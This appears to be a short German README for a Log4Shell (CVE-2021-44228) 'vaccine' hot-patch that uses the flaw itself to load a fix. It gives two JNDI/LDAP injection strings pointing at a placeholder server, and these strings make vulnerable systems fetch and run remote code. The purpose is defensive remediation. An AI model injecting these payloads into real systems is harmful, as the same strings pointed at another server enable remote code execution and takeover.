
CVE-2021-44228 per Hot-Patch beheben, indem die Schwachstelle selbst ausgenutzt wird.
Hot-Patch für CVE-2021-44228 durch Ausnutzung der Schwachstelle selbst.
Fügen Sie den folgenden Code an einer beliebigen Stelle ein, die wahrscheinlich anfällig für CVE-2021-44228 ist:
${jndi:ldap://your-own-server/patch}
Um einen MITM-Angriff während des Patch-Prozesses zu verhindern, wird das folgende Payload empfohlen, das jedoch eine geringere Kompatibilität mit älteren Java-Versionen aufweist:
${jndi:ldap://your-own-server/any_string_except_patch}
Laden Sie die neuesten Releases herunter
Legen Sie die Systemumgebungsvariablen LOG4J_HOTFIX_HTTP_PATH und LOG4J_HOTFIX_HTTPS_PATH fest, wenn Sie Hotfix.class auf Ihrem eigenen Server hosten möchten
Bitte beachten Sie, dass Hotfix.java für maximale Kompatibilität mit JDK6 kompiliert werden sollte.